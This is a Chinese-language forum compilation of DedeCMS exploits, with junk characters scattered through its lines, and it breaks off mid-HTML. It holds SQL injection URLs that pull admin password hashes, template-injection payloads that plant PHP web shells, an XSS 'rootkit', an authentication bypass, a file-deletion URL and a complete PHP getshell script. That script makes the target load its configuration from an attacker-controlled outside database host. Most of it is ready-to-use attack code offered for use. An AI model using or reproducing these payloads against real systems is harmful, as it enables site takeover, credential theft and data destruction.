|
|
; v$ n$ z4 p5 o+ R' bDedecms 5.6 rss注入漏洞# D5 K2 S/ l5 [
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
# \0 a, z, K# \8 Z0 t, w; a5 L5 d! r) v+ V
$ m9 C$ _. W) v5 C( g8 h
" K. o$ a. X" u: T- F% T
6 ~' ]) Y$ L+ D' h. w; L3 |3 _) B
) F# |+ q( _; {/ d. x' e- W& Z3 |: u* b0 z* @0 C
5 w5 ~$ U* ^) d/ _0 G( Y: @8 NDedeCms v5.6 嵌入恶意代码执行漏洞7 @& O/ r7 M% d
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
4 P6 b% A! T0 l( G0 H$ C0 t发表后查看或修改即可执行
! M. o7 `* b& u7 d7 r8 _3 Ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! A0 ]9 w1 S2 X& ]& J/ f生成x.php 密码xiao,直接生成一句话。
7 V! r4 E' y0 R: K2 f3 ~/ y3 q6 r9 \, }( s8 ]* s
- C7 S( x7 }; `2 W1 n. V
I) `/ Z D& F6 P6 y$ g6 `: t8 f, g" r9 p5 N+ q; S* B
O8 v1 s# k* f, R7 t% w/ J" p
( j# q x+ I* g& z4 @ U$ c5 w# o% {! z
* n* ~$ {1 I/ w$ i% D+ O' M) l/ R7 YDede 5.6 GBK SQL注入漏洞
) y* ~. |3 ?6 F# v/ whttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
; h, d+ m! a- Y' B) Thttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
7 q6 r7 \% D2 x& }http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A73 i. u+ S5 t5 o9 C4 M8 q
, A d& q+ y& G4 a
/ D* n2 l+ R9 G" e0 K
4 k$ [" v1 Q2 d4 I
* I% g5 h3 m- I5 }
+ [' o' z( _7 O, ?- \
2 U5 s) k6 n9 n6 e K3 t
% N5 ?# V3 n$ O' n
. I. w. w5 ^+ ]" E( B# U( \8 S: s6 oDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞. S+ q, f0 B+ _, n2 ]( {, g
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` + Y, b8 q& u; l: S( V
( h) H: C7 z2 }
* z9 r0 K+ \1 g4 g! E$ Y5 F, e9 _9 ?! B& k ]+ I& { A
( u; A5 e# B# T; ]
; I# o2 p& f% H' R; m9 Z$ h
3 M R2 W1 h2 q# C) d$ @DEDECMS 全版本 gotopage变量XSS漏洞3 Y0 l: P0 B1 R! |9 }- }& s
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 2 Y. G; e" V+ u0 ^; \+ f5 d# h
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="* k3 N6 j h5 g2 p! y; u O/ R
5 W# c7 V; U' G1 r
: |% v) Y2 ^9 e% L7 n
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
1 f% R* G. I* fhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda8 S0 T+ `; E* T
4 W. |3 j' E5 }
, ~( V9 Y4 h* l- m6 N2 Ghttp://v57.demo.dedecms.com/dede/login.php
% A# B+ D3 O4 \. Q4 X3 t/ ]' a' d! z7 B2 J; F( i8 f5 J8 R- G# H
7 w0 z& {( D8 c9 Icolor=Red]DeDeCMS(织梦)变量覆盖getshell
1 k% D% Z9 z$ @) u#!usr/bin/php -w
3 m8 b# v6 b- |9 C<?php3 d% l; y2 ^7 l3 \
error_reporting(E_ERROR);
9 ~) C2 v, `; d* A3 {set_time_limit(0);1 z3 |+ r! p) Q5 x
print_r('
3 V3 x4 o; K2 e% zDEDEcms Variable Coverage/ I7 C" d7 X {, a- M- X7 h
Exploit Author: www.heixiaozi.comwww.webvul.com
% t3 F/ z1 \1 s);) P1 ~6 f& P# a7 F
echo "\r\n";
' T+ l& t e1 V9 Gif($argv[2]==null){4 Y6 B w7 [ e8 m2 P7 v( g
print_r('
* D2 v" |1 U- i, s5 e! G# \+---------------------------------------------------------------------------+1 B0 y( [) x1 W+ {3 ] }6 b& O4 S
Usage: php '.$argv[0].' url aid path
4 r' w/ v: z& n7 Gaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
" Q+ k9 N5 d3 XExample:
* U) b0 x& r# r0 Vphp '.$argv[0].' www.site.com 1 old
4 q/ _* g, F( f# g7 u+---------------------------------------------------------------------------+6 y! I3 U6 G* F
');4 j' W, O" L) y6 Q
exit;; v7 |5 L7 j) r/ y; X
}
: V* V6 S4 u. u$url=$argv[1];
2 J' v- S, y: Z4 t: N$aid=$argv[2];7 r% q. Q- @! l7 G* I5 X* n
$path=$argv[3];8 i3 p7 V2 ] a& F' b
$exp=Getshell($url,$aid,$path);. b7 [4 K& U) f6 ^( P- y1 x
if (strpos($exp,"OK")>12){
; h+ @( ]5 {8 g0 wecho "9 R; k9 N& n: n, F. S6 @
Exploit Success \n";& x0 x5 W- n1 V; i6 l8 ]
if($aid==1)echo "
; J% _7 V8 I# u: I0 bShell:".$url."/$path/data/cache/fuck.php\n" ;
/ R: G4 M" P; J* D5 R7 T
! i) u* S! W8 ~' C
/ l; Q! ^* I8 e/ k9 i4 l. dif($aid==2)echo "
% A2 C. z* L6 e" R! ^% {+ l3 \- u, iShell:".$url."/$path/fuck.php\n" ;
1 E5 w: v% R8 I% S3 G, l* f& |% D$ H3 ^2 J/ a
8 M& A+ ~5 N" d4 y
if($aid==3)echo "
0 Q( K0 V, }, E4 B9 K" C. mShell:".$url."/$path/plus/fuck.php\n";, k4 | z. t' Q% V! W& N
/ c3 N8 ?, P$ h0 P
4 z* t8 S1 c/ ]+ H6 O}else{1 @, y2 D. g* L% R
echo "2 i2 X1 v2 ^2 Y% H$ O
Exploit Failed \n";+ e9 e3 h( c. x
}
, {6 a. A7 t1 S3 ]/ @6 Wfunction Getshell($url,$aid,$path){
' }7 S" }; }. u* Y, O! _! ^9 i+ x( W$id=$aid;
: F7 s' ^9 M' n9 p- u* O$host=$url;2 i( C+ D6 B, @- D8 [/ F+ {) p" c
$port="80";
# C, e8 v$ E2 I: e# J% D8 @! v! R. a$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";. P8 H% ?8 J7 J0 ?! G
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";/ s: u+ m, B7 J
$data .= "Host: ".$host."\r\n";
& L, n8 `8 F# J5 k( q# j1 t$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";* H4 \4 o* B. i( P" }* a6 M
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
a( y% N9 P4 [$ L# G$ S$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";' A/ ?/ N: Z/ T2 M) Y
//$data .= "Accept-Encoding: gzip,deflate\r\n";5 {: S6 ]1 o6 `$ G2 L, [, g
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";# S. G* {8 g6 u
$data .= "Connection: keep-alive\r\n";$ j" r. D Y4 E9 b! u+ _4 ?
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
, j3 N/ J% Q) ?' u% o. J7 S$data .= "Content-Length: ".strlen($content)."\r\n\r\n";% E, x s% T3 m! z9 P% X2 ~/ [4 A* y! n
$data .= $content."\r\n";
% L# e+ |! Y3 ?1 n$ock=fsockopen($host,$port);
: X( ?* V( s: i& G3 j uif (!$ock) { `3 [9 g2 ~, r( ^
echo "
! |6 V! o2 V1 q, M' B0 q5 f$ NNo response from ".$host."\n";
# \# O% t9 o- l5 \} p/ ~5 A) B' R& X
fwrite($ock,$data);& Y, \' B; q/ c$ e6 [4 G
while (!feof($ock)) {
; Y( B1 f- W1 G$exp=fgets($ock, 1024);" K" ]% a, r( q! e- r! u, O t
return $exp;8 {6 Z& X9 H' D& x. L: H
}5 C5 D! @2 S- N! S; Q; Y, M) k
}. O4 e8 H3 M! z( m2 K0 P! G+ l
& g, Z- }9 e7 l- m
. N: M# O1 J8 S3 O?>" I* P3 U9 a6 C9 c- R! B- o
) G' y& \- C. o8 O1 g+ t! a4 N9 y- P/ I. y6 @
1 k& k ]& l1 ~* P* L
6 ~- ^$ _ s5 I5 A
+ y( K8 s4 R; Q, K s9 o1 f' M. b9 K2 b) H; R9 c
0 n+ V5 ^# s" d \1 Q3 `& n8 @# z; o
) p+ }: D! B1 D5 ] ^* h# g& B- Q1 z2 X: `2 X5 F$ j2 i
- z K7 g% ]* b% q% Y! J, }DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
- Q3 l, @+ S* {" `5 khttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ e! X3 B3 a( s9 o" b% d, l/ i; G9 e- d2 }5 D( r0 _! [
6 m% ~- j3 s9 _把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ r+ P% Z+ X+ E5 c
( D* S; n7 r* B5 u
: [! ~0 N1 X6 S! q4 I9 C. W- @
此漏洞的前提是必须得到后台路径才能实现2 g" |5 S/ |7 N8 z0 {4 }7 Z% d3 K
2 w# e) L5 n3 @* Q K) ?
5 C2 C3 y) |$ X+ ~9 m9 J& {0 t+ d8 S. I+ G
# U" |, ~* a- ?$ o2 U3 h
1 T$ V* F( o7 J1 S, v
& d3 B- F2 v% _( _% L1 B9 a- e, y5 R! X+ b! g7 g( O+ K5 ?# ^
- L1 F7 X" k: c& y- a5 q
' ^1 @! `: P" v# G3 i4 I/ p& U/ x
. ~5 j5 X6 A" x* U* r$ I. ODedecms织梦 标签远程文件写入漏洞# a e8 s6 {- d* ?- l0 y# l6 [
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
# F( I+ Y$ m" G: w9 @+ I* U% V: l) P/ h
1 x1 Q3 O5 T& f0 S% h
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. i( D% O/ S+ X3 b# h<form action="" method="post" name="QuickSearch" id="QuickSearch">
; H% w( h! l2 S<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
6 v* s6 p/ S2 N6 l+ S8 D<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />9 H' z8 Y! z/ c# E8 g, V' H
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! r+ l' o1 v" j( y9 p; R
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
; \# u: E9 `% ?' t/ y<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />. d+ S( J1 v% s5 S
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />! w4 |" f$ p) e. y t
<input type="text" value="true" name="nocache" style="width:400">* v8 H& c6 E0 @" N
<input type="submit" value="提交" name="QuickSearchBtn"><br />
. E$ S" ^& m2 E# f# n</form>' T5 K- l7 g5 L& U. t! a
<script>
3 w2 C, ?+ [" ^* _- ]function addaction()( O: p$ F8 }. d5 I
{/ f) X/ C% c0 C% e9 Z
document.QuickSearch.action=document.QuickSearch.doaction.value;" c/ i; i0 V3 c6 _( J( A* X0 R
}. m6 ] b- {1 f e. O5 I8 C
</script>! x# n& W- V) U2 d% n) N+ q
2 f0 l- [8 m: x* s/ B
- S$ C& D/ t; A4 K d5 w/ ?; J$ o3 ^2 W- t2 r
0 R' b u3 A: y+ c
& c) E4 F3 x4 b/ S4 p2 `
1 I V" N1 v! |& l* w; o' e4 f
) G7 X. z; n; a' k, D+ c" s: d& f8 @
+ _2 D7 \& L, b, c, t, M+ F% L
6 t$ w9 K5 g: e |' LDedeCms v5.6 嵌入恶意代码执行漏洞4 f2 g9 Z4 W( a. X3 ]; B6 w
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
/ P& D6 @# c1 g ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 p; _& b2 g7 t. i4 v" q; a
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得/ Y- U; A' Z5 \# h6 H( i
Dedecms <= V5.6 Final模板执行漏洞. X. g4 Z- \5 P$ ?' x _; { @
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:" v, \* Q4 o4 H. }0 A' I# i
uploads/userup/2/12OMX04-15A.jpg
; J/ Z# ]& |! r3 v- K* K5 v7 Q/ P( K0 \1 i N+ Z
" T, N2 k6 J) |- [& j) F模板内容是(如果限制图片格式,加gif89a):& b. \7 A# \9 A; m
{dede:name runphp='yes'}
3 X; {5 c# }& m& n {$ B; n$fp = @fopen("1.php", 'a');
' h. S4 z3 p; B% A3 {@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");. F" B- v: l* Q- V7 W; b
@fclose($fp);
6 s- E9 J$ e$ ^8 ^{/dede:name}
9 \: W: l" Y+ x2 修改刚刚发表的文章,查看源文件,构造一个表单:$ ?+ G* u, u% V7 a: c
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">+ h8 o ~5 w4 h1 m) t
<input type="hidden" name="dopost" value="save" />6 A! d, t) q& U' y
<input type="hidden" name="aid" value="2" />
# _; v3 E+ j" D: f5 H' n# r& {<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />( w+ J) H3 W* [9 C; C
<input type="hidden" name="channelid" value="1" />
v# b9 r2 f3 j1 q' l<input type="hidden" name="oldlitpic" value="" />
8 |( h* ~& l( D- p' A% c3 x<input type="hidden" name="sortrank" value="1275972263" />
0 n* f8 A8 n) Z' s2 A, L( J9 {. M& g. ?% t( T" ]3 i' s8 k2 m8 f! F
7 K2 I/ u, ~& R$ j7 k {9 l
<div id="mainCp">
' f" ^# a7 R0 p/ L- [) ?+ q<h3 class="meTitle"><strong>修改文章</strong></h3>
9 W% }; ^4 k3 x$ j9 J7 D! J2 ^% I
9 t2 f! v' s& H" {% s) F! |6 ]( i' l! e6 v* f2 d' |+ P
<div class="postForm">
* E" l% b/ f' a# s, Z% I<label>标题:</label>( o$ \1 F! M) `/ G5 d9 y) E
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" ^" |; |: [: K7 s) d- A$ M7 N! c
# p( E4 @2 V/ _ T
2 D5 s' a' D8 E7 |4 i<label>标签TAG:</label>
7 _1 |. D8 t0 B# A<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
' M5 C6 B2 ?* y( b9 B% F' A
0 R( s# f- X' C6 |" ^+ X; ~/ P3 @- c; |# W+ g( H3 v8 c
<label>作者:</label> }; A+ M) Z3 g9 V3 R
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>1 `8 W6 B, v M: w' A+ Y
' u. j3 C5 _; X5 r6 I, ^
$ Y, E+ W. @5 r; L& A<label>隶属栏目:</label>
% c# D) ?6 U1 a" D" c. l<select name='typeid' size='1'>( e% Q& h% b& ?1 N
<option value='1' class='option3' selected=''>测试栏目</option>5 A+ D: [ \7 `; C$ D4 F# A9 U
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
' A0 v; n0 c' V7 n) G; t4 H+ A8 Z$ k4 n8 V/ c3 N9 c6 h# l) \
' S. i. g2 S7 V<label>我的分类:</label>
; ^/ k V+ i* o' Q<select name='mtypesid' size='1'>
2 m$ W! a4 a& L( g! ?<option value='0' selected>请选择分类...</option>
5 n6 S- Y9 j5 w, q7 H& r+ N7 H# l3 H" A1 S<option value='1' class='option3' selected>hahahha</option>+ w# K7 X) k- u) Q) x- F
</select>
9 Q/ o. t! O- M+ Q# K g( X* B2 w2 J* {4 k
# p+ V: m$ V4 d$ I7 J<label>信息摘要:</label>% s! g2 J2 G( K. k, n7 Y
<textarea name="description" id="description">1111111</textarea>
3 ^. O- [1 ?2 N7 Z5 f(内容的简要说明)( q, M! J" a" n6 {: v! \
3 u: } B. I( F* O6 g5 M
* u2 j c: K1 X3 F
<label>缩略图:</label>( E% T- u/ B! a; F- Z L
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
! `; v" D' } d- y/ M. q6 d4 G, g6 }) N6 U7 D* C- g+ t
& H* h5 u- X' }# I8 H1 U" D: |<input type='text' name='templet' t3 h. u, b5 N# [
value="../ uploads/userup/2/12OMX04-15A.jpg">3 X( ?$ { K; V4 B- i, |
<input type='text' name='dede_addonfields'/ Q/ X, d& d7 G- W+ d V
value="templet,htmltext;">(这里构造)$ X5 B1 p s4 k
</div>
# Z# s8 n. ]3 X+ m* G! R1 _2 r/ d$ r1 W
7 a3 o9 k4 s; s. j: u! [( M% ?+ Y C$ \- m' h
<!-- 表单操作区域 -->
" P, b6 ?/ g$ u8 q6 K<h3 class="meTitle">详细内容</h3>
\9 b# A5 L( J
5 V5 R% X$ y P
& y% w; B( |9 _2 b) V& ~2 |: i<div class="contentShow postForm">
- C5 {+ i+ j* r f" d! m) t& n<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
" ?( O+ ?; r) i7 u, p+ N
: }* g/ {% M+ d' n! M0 J2 d4 `- m5 ?) N( v! C* n& w' j4 i- A
<label>验证码:</label>
+ ?* g3 p, j9 }" T( n; C8 `<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />/ t. R' o' O5 B; b( i, o% y5 J- l
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& @+ I1 k. u4 i& g1 J- p
8 y# O5 Y' c' |+ u5 q' j
* U) r" U5 J( E, T<button class="button2" type="submit">提交</button>
0 { [! l5 F( k& I+ }5 p<button class="button2 ml10" type="reset">重置</button>9 ^) f. R/ `$ U& r t. t; C; E
</div>7 s+ O9 S# c4 H
" f z1 F$ s- e5 e
0 q2 A& u7 A+ Y8 t
</div>4 p. w8 m A/ s9 T& D% D
* Y; ~% B9 ~, |- W9 l4 N3 Z. ~. [ I8 n2 T
</form>
& K7 p. C8 m& p% d* a) b* a
/ p. I) y' [' e$ m) I9 q1 Y8 p6 g! T" U
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章: C9 t+ E( d4 E: m4 K
假设刚刚修改的文章的aid为2,则我们只需要访问:
* t; j% R0 A# A, h/ N1 H/ `http://127.0.0.1/dede/plus/view.php?aid=2- F/ K( \! @) m7 q% t. \
即可以在plus目录下生成webshell:1.php
5 N6 p$ p E8 H3 }0 G# c: V1 e: x* Q/ z! \: K) N. n* I
, f) V0 L, Y+ m j) o
$ ]0 W" W6 x9 k1 P# r. i( ^
2 t5 G3 C6 Z; m' x- ~! {2 |, k' p: B$ e9 E/ g* @% u9 Y2 }' e
; A: k4 M$ x6 W. ~) f* f% i8 |
3 t# M3 E$ R9 H. ~/ h9 b5 I
. ]( C$ r5 k1 Z" K+ f# h- h& L2 |
- ~ U6 l% v( }" U) t2 m0 k$ v6 U
/ M( l% m l/ a
! j2 r* b5 \( G9 J1 Z5 Y$ T. t2 q4 l( a2 T
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
2 ~8 K7 }% d1 o- ~& W2 E& v' k- QGif89a{dede:field name='toby57' runphp='yes'}7 E# e1 E2 u5 B2 \, m3 Z
phpinfo();
0 z# {2 K; H y* w1 z8 L{/dede:field}
: h$ B' ^2 o5 k5 _保存为1.gif: P2 y- Y- m2 |. d$ Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 6 ]1 O: m& [" `" q
<input type="hidden" name="aid" value="7" />
; v; [# t1 X* Q" e# {1 o2 N1 ?<input type="hidden" name="mediatype" value="1" />
: ?# ]* D$ T S7 f5 w<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
( M8 K$ h; T( X& S0 J<input type="hidden" name="dopost" value="save" />
5 O; B* F5 Y' K2 z9 O<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 6 E( V, a7 R8 d5 n
<input name="addonfile" type="file" id="addonfile"/> 9 f3 N" i% b# d9 {9 D# R
<button class="button2" type="submit" >更改</button> # `+ |: \2 O; W3 v8 J, k2 P
</form>
1 f- J8 `+ C# P1 H* k
# B' t; ~" s7 A5 C
3 z5 x& r) G- @7 B2 z% c构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
8 R/ r) P* y* @, Q2 E发表文章,然后构造修改表单如下:
% B+ D# G" h- P1 k% B6 j
( m1 D7 M4 k0 @8 j) h. O- l& b Z$ S& v! E, d1 I0 Q \
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 4 g% E9 e; O7 @8 C
<input type="hidden" name="dopost" value="save" /> : ?4 @- r; S& K7 i$ \$ O# |( R
<input type="hidden" name="aid" value="2" /> ' t/ N2 O9 r4 W$ t4 f" S
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
4 }" z* O1 \9 {5 E$ E4 [<input type="hidden" name="channelid" value="1" />
' F( B. c# ^( A5 h7 }<input type="hidden" name="oldlitpic" value="" /> 8 G8 q. Y0 L' L
<input type="hidden" name="sortrank" value="1282049150" /> % M' K0 l" `' ]: V) }
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
" q/ [+ A- @1 _+ z7 Q; v* [<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
: R8 S& ~! W% F+ q% N( E<select name='typeid' size='1'> & N$ M1 v8 A: n- v
<option value='1' class='option3' selected=''>Test</option>
7 A( e$ F F7 g" `3 f<select name='mtypesid' size='1'> ' d& L3 w9 b! d
<option value='0' selected>请选择分类...</option>
' F+ c/ }; I0 K) B& Q<option value='1' class='option3' selected>aa</option></select> : H. z* C# R r0 O! {4 k3 u+ E
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ; M: s- Q; q% V- D: W2 J
<input type='hidden' name='dede_addonfields' value="templet">
* f2 o& U; p- e' U/ _3 I- D<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
( C9 y7 f$ f; |' H2 ~9 q4 U<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> $ Y; q X$ l$ c
<button class="button2" type="submit">提交</button> : \# K9 ~4 k% V
</form>/ i7 B$ y1 l5 ?2 m' X# ^6 }! K
9 m' h; H d* o; d2 Q* l; Z0 J5 q8 ?- ]8 a
, Y1 D; A: x$ n Q3 W8 E4 w" ^4 |% B- q
; U6 S, B5 r# j4 ^! v
6 w% g4 ^ }/ M, x& }' T1 O% k4 ~4 T4 p/ U7 v! ]. y& K, o
1 \0 F$ B' ]" q. ]* [0 n, ]7 Z5 b
# f3 U5 c2 [+ |0 N4 v, p7 C
$ Z0 U; C% E0 T R4 R0 \
) A- Q! k4 h. {" W7 ~$ q& n. L' B( o' R
. l. w% z9 V% ~& G8 }/ H8 M" [& _0 M' x2 f: W3 r; j9 k q' o% H$ [3 {
织梦(Dedecms)V5.6 远程文件删除漏洞
* ]" Z- Y% l4 P; }http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif$ w& O" b. D0 p4 Y8 `
) [- r: b7 r$ i2 L; v! O6 H a% w$ U2 `) z" A0 B' ]- R
+ {1 ~( R9 v m8 A* R0 Z# b4 _" T) g# A j
8 y+ D* c9 |$ A: f
1 n2 m$ X$ b m- z- ^* Y5 R" N% x5 a7 Y$ p9 W/ m. Y4 z
2 ^# b f; j0 k9 T+ b* J1 } Z
( W% j/ F9 K5 o2 R& D, T# ], E
, L! q2 o. }" V$ {织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
1 {1 B5 E( p6 c. W9 ^http://www.test.com/plus/carbuya ... urn&code=../../
1 p& x& F/ C7 Z- ~, z# y& d" s, b& ^8 }
6 {! W+ \! H" I! r# d
# F; V' i% `. ]; I; L; J0 ]. D B) f6 [1 H* w( o3 g
2 l/ L/ l, S2 q" g
8 N; i0 Y( w' Q1 T' F8 Q2 R
0 s) v, L4 R; N1 Z/ C
- H% j ~0 ]/ K' Q8 g5 b
/ E; l& Q8 t5 }. ?- f. \* s3 A
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' k: k1 s2 p) k5 _plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`+ w8 D3 [4 g8 ~# C" O$ v- i
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* h& L1 G$ y1 s- t6 o/ N6 t1 k! F% k; v, `* g# [: c3 n: I& l- K
# ]6 N' k9 X# J, e. A# w( a% H! s+ z! g9 ]0 ?5 ~* v/ R
: K: j) I8 d5 E: y# P( l* c
U( D) K) i/ R2 j0 R
) ?1 Y( H: ~2 C" D Z$ v6 j3 m0 {1 J1 c0 _/ D+ m4 {
2 m6 @* W, d; X1 [% w
G b2 r! S' j% s' C/ r
0 V B1 f& ^ R3 c" s织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
( v [: a3 H' w9 ?! B* E3 Zhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='- }1 W2 h( K L
) O% }7 n# p- C3 f% ]- ^2 O& I s, q6 C- X4 _$ P+ z1 f
* d+ B( S0 ]. C& W" i
, V# {7 W% o h4 Z+ K1 u6 I; P" x) K z" z* R3 z, g- u
! N- g# J5 J/ Z& F/ \
) j# [5 y. `$ d( f. }8 B
# m& x( E* ]+ ]
) c5 d# L, _: y0 q+ C
& z, M" E0 H( }# i0 i5 Y4 n
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞( S- R7 o" ]* C9 q+ a$ k( H; N
<html>
4 `" J# w- q; Z; n: Z+ a<head>
